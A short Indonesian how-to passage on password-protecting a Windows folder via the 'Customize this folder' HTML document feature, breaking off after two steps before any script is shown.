Anda punya data penting dalam suatu folder dan ingin folder tersebut diproteksi dengan password ? Ini caranya :
1.Klik-kanan pada tempat kosong disamping folder yang akan diproteksi,kemudian pilih CUSOMIZE THIS FOLDER ,kemudian pilih CREATE HTML DOCUMENT FOR THIS FOLDER.
2.Kemudian anda akan masuk ke Notepad, Gulung layar sampai melihat
script